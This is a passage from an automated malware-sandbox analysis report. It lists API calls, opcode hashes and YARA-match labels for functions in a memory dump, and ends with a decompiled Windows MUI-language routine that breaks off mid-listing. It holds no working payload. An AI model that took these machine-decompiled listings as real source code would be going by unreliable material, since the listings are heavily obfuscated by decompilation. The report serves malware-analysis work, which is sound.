                                                                                                                                                                • Opcode Fuzzy Hash: ddc631b31dbe1b46d4deae8cc24b5b7275541578467dd39335509dc8f548f312
                                                                                                                                                                • Instruction Fuzzy Hash: 3521EFB1641700ABDB21DF68D8A1FABBBF4BF84700F04842DF5599B282D331A945DBA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 000984B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID: .z`
                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                • Opcode ID: 6da81262ff2773392f8bff64e37c46662a0483ad1dd99a88b825d7dbf64cb94c
                                                                                                                                                                • Instruction ID: caf712d437f19befc36889ea438b68f961b675315712f2db7ccdb06d750ace95
                                                                                                                                                                • Opcode Fuzzy Hash: 6da81262ff2773392f8bff64e37c46662a0483ad1dd99a88b825d7dbf64cb94c
                                                                                                                                                                • Instruction Fuzzy Hash: 80E0EDB1240204AFDB14EF68CC48EE3376CAF89360F008285F90C97782DA31E800CBA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 000984C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID: .z`
                                                                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                • Instruction ID: 328bf0f62db3d8abc1ce4827b1d9d951b4c8beb809e8fbe3683c68d47cc07640
                                                                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                • Instruction Fuzzy Hash: 80E01AB12002046BDB14DF59CC45EE777ACAF88750F018554BA0857342CA30E9108AF0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                                                                                                • Instruction ID: 510fcc912754c5bf7b46505b14e642f0217a5f1fce34de7c2b8a5746be955fa1
                                                                                                                                                                • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                                                                                                                • Instruction Fuzzy Hash: 8001A731A802287AEB20B6949C43FFF776C6B00B50F140119FF04BA1C2E694690647F5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 000985C6, Relevance: 1.6, APIs: 1, Instructions: 60processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: 7a2aea645124cbf46cc6ded769b80444bf1fff72ff4be2409c307326cb9350bc
                                                                                                                                                                • Instruction ID: 15d1ee5b3d00bd88c59fc3c4ddc2965e2bac6d8b16bc4f36d6a4302058532bc3
                                                                                                                                                                • Opcode Fuzzy Hash: 7a2aea645124cbf46cc6ded769b80444bf1fff72ff4be2409c307326cb9350bc
                                                                                                                                                                • Instruction Fuzzy Hash: 1D11D0B6204509AFDB14DF99DC80DEB77A9AF9C354F158259FA5CD7241CA30E812CBB0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00089B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                • Instruction ID: cf5d96cfa9e9af59e5533b7ad4aec78180b733f8f6a1309060bc0b03ea090bf5
                                                                                                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                • Instruction Fuzzy Hash: FB011EB5E4020DABDF10EBE4ED42FEDB3B8AB54308F0441A5E90897242F631EB14DB91
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098611, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                • Opcode ID: 6f0b82b46394912b41b2e9737ffe668d3a18b84c4abd069f6f63adfaecdb6b3d
                                                                                                                                                                • Instruction ID: 5e6339ab94e75093fd858a852ade0355bb464c6bf8918a3e442e103694b39524
                                                                                                                                                                • Opcode Fuzzy Hash: 6f0b82b46394912b41b2e9737ffe668d3a18b84c4abd069f6f63adfaecdb6b3d
                                                                                                                                                                • Instruction Fuzzy Hash: E4F08CB16043187BCB20EFA4DC45DEB3B68EF85210F018455F9489B342DA31E91187E1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0009852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: 1d0b9fac774c0d09c9ecc74658c4b6ba8c9bd20f57d28d474cb94c6a25253679
                                                                                                                                                                • Instruction ID: 7bb382d036921dee1a3d13b54d3f781a201bc1a8cdd8b33b6b955a185566d764
                                                                                                                                                                • Opcode Fuzzy Hash: 1d0b9fac774c0d09c9ecc74658c4b6ba8c9bd20f57d28d474cb94c6a25253679
                                                                                                                                                                • Instruction Fuzzy Hash: B601AFB2211108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241CA30E851CBA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                • Instruction ID: c59b42b6632d0895df0417b4e2b9a8becf80424f8c64f19b9aee7e8aff47414d
                                                                                                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                • Instruction Fuzzy Hash: 8101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00097000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                • Opcode ID: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                                                                                                                • Instruction ID: 13e46d4aed26943698e3a92a84b8931bbc1eaa6c978a867ff3c1235cce0d9444
                                                                                                                                                                • Opcode Fuzzy Hash: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                                                                                                                • Instruction Fuzzy Hash: 53E06D333902043AE7306599AC02FE7B29D8B81B20F140026FA0DEA2C2D595F80142A4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                • Instruction ID: fbdf59b571a901eefcdfcf86bfa9680329d111587b15b1f5142f710709a765f9
                                                                                                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                • Instruction Fuzzy Hash: 02E012B1200208ABDB14EF99CC41EE777ACAF88650F118558BA089B382CA30F9108BF0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                • Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
                                                                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                • Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0008D3F7, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                • Opcode ID: 647fa05bcfefcfcf4922a18b19f9f8b7471c0d939770c379d4d062b1077a1c0b
                                                                                                                                                                • Instruction ID: 65e653673551a3e94456470bc8fb2ff8c0e0f24f55523bced2243280849510be
                                                                                                                                                                • Opcode Fuzzy Hash: 647fa05bcfefcfcf4922a18b19f9f8b7471c0d939770c379d4d062b1077a1c0b
                                                                                                                                                                • Instruction Fuzzy Hash: 68E0C2727802002EEF20FE74DC83FEA238AAB5A710F084034F548DB2C3DE20E4028A20
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0008D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                                • Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
                                                                                                                                                                • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                                • Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02018788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                			E02018788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02018460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01FFE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0201718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02018460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0201718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02018460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02018460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02018460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0201718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01FFE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01FF2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0200E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01FFE2A8(_t322,  &_v68, _v16);
								if(E02015553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0200E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01FFE2A8(_t322,  &_v68, _t236);
								if(E02015553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0201718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01FFE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01FF2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0200E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01FFE2A8(_v12,  &_v68, _v16);
							if(E02015553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0200E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01FFE2A8(_t322,  &_v68, _t269);
							if(E02015553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0201718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01FFE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01FF2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0200E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01FFE2A8(_v12,  &_v68, _v16);
						if(E02015553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0200E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01FFE2A8(_t322,  &_v68, _t296);
						if(E02015553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01FFE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                                0x02018788
                                                                                                                                                                0x02018788
                                                                                                                                                                0x02018791
                                                                                                                                                                0x02018794
                                                                                                                                                                0x02018798
                                                                                                                                                                0x0201879b
                                                                                                                                                                0x0201879e
                                                                                                                                                                0x020187a1
                                                                                                                                                                0x020187a4
                                                                                                                                                                0x020187a7
                                                                                                                                                                0x020187aa
                                                                                                                                                                0x020187af
                                                                                                                                                                0x02061ad3
                                                                                                                                                                0x02018b0a
                                                                                                                                                                0x02018b0d
                                                                                                                                                                0x02018b13
                                                                                                                                                                0x02018b19
                                                                                                                                                                0x02018b1f
                                                                                                                                                                0x02018b25
                                                                                                                                                                0x02018b2b
                                                                                                                                                                0x02018b31
                                                                                                                                                                0x02018b37
                                                                                                                                                                0x02018b3d
                                                                                                                                                                0x02018b46
                                                                                                                                                                0x02018b46
                                                                                                                                                                0x020187c6
                                                                                                                                                                0x020187d0
                                                                                                                                                                0x02061ae0
                                                                                                                                                                0x02061ae6
                                                                                                                                                                0x02061af8
                                                                                                                                                                0x02061af8
                                                                                                                                                                0x02061afd
                                                                                                                                                                0x02061afe
                                                                                                                                                                0x02061b01
                                                                                                                                                                0x02061b06
                                                                                                                                                                0x02061b06
                                                                                                                                                                0x020187d6
                                                                                                                                                                0x020187f2
                                                                                                                                                                0x020187f7
                                                                                                                                                                0x02018807
                                                                                                                                                                0x0201880a
                                                                                                                                                                0x0201880f
                                                                                                                                                                0x02018810
                                                                                                                                                                0x02018813
                                                                                                                                                                0x02018818
                                                                                                                                                                0x02018818
                                                                                                                                                                0x0201882c
                                                                                                                                                                0x02018831
                                                                                                                                                                0x02018838
                                                                                                                                                                0x02018908
                                                                                                                                                                0x02018920
                                                                                                                                                                0x020189f0
                                                                                                                                                                0x02018a08
                                                                                                                                                                0x02018af6
                                                                                                                                                                0x02018af6
                                                                                                                                                                0x02018af8
                                                                                                                                                                0x02018afb
                                                                                                                                                                0x02061beb
                                                                                                                                                                0x02061beb
                                                                                                                                                                0x02018b04
                                                                                                                                                                0x02061bf8
                                                                                                                                                                0x02061c0e
                                                                                                                                                                0x02061c13
                                                                                                                                                                0x02061c16
                                                                                                                                                                0x02061c16
                                                                                                                                                                0x02061bf8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018b04
                                                                                                                                                                0x02018a0e
                                                                                                                                                                0x02018a11
                                                                                                                                                                0x02018a14
                                                                                                                                                                0x02018a15
                                                                                                                                                                0x02018a18
                                                                                                                                                                0x02018a22
                                                                                                                                                                0x02018b59
                                                                                                                                                                0x02018a28
                                                                                                                                                                0x02018a3c
                                                                                                                                                                0x02018a3c
                                                                                                                                                                0x02018a42
                                                                                                                                                                0x02061bb0
                                                                                                                                                                0x02061b11
                                                                                                                                                                0x02061b11
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018a48
                                                                                                                                                                0x02018a51
                                                                                                                                                                0x02018a5b
                                                                                                                                                                0x02018a5e
                                                                                                                                                                0x02018a61
                                                                                                                                                                0x02018a69
                                                                                                                                                                0x02018a69
                                                                                                                                                                0x02018a6d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018a74
                                                                                                                                                                0x02018a7c
                                                                                                                                                                0x02018a7d
                                                                                                                                                                0x02018a91
                                                                                                                                                                0x02018a93
                                                                                                                                                                0x02018a93
                                                                                                                                                                0x02018a98
                                                                                                                                                                0x02018a9b
                                                                                                                                                                0x02018aa1
                                                                                                                                                                0x02018aa1
                                                                                                                                                                0x02018aa4
                                                                                                                                                                0x02018aaa
                                                                                                                                                                0x02018ab1
                                                                                                                                                                0x02018ac5
                                                                                                                                                                0x02018ac7
                                                                                                                                                                0x02018ac7
                                                                                                                                                                0x02018ac5
                                                                                                                                                                0x02018ace
                                                                                                                                                                0x02061bc9
                                                                                                                                                                0x02061bce
                                                                                                                                                                0x02061bd2
                                                                                                                                                                0x02061bd2
                                                                                                                                                                0x02018ad8
                                                                                                                                                                0x02018aeb
                                                                                                                                                                0x02018aeb
                                                                                                                                                                0x02018af0
                                                                                                                                                                0x02018af4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018af4
                                                                                                                                                                0x02018a42
                                                                                                                                                                0x02018926
                                                                                                                                                                0x02018929
                                                                                                                                                                0x0201892c
                                                                                                                                                                0x0201892d
                                                                                                                                                                0x02018930
                                                                                                                                                                0x02018935
                                                                                                                                                                0x0201893a
                                                                                                                                                                0x02018b51
                                                                                                                                                                0x02018940
                                                                                                                                                                0x02018954
                                                                                                                                                                0x02018954
                                                                                                                                                                0x0201895a
                                                                                                                                                                0x02061b63
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02018960
                                                                                                                                                                0x02018969
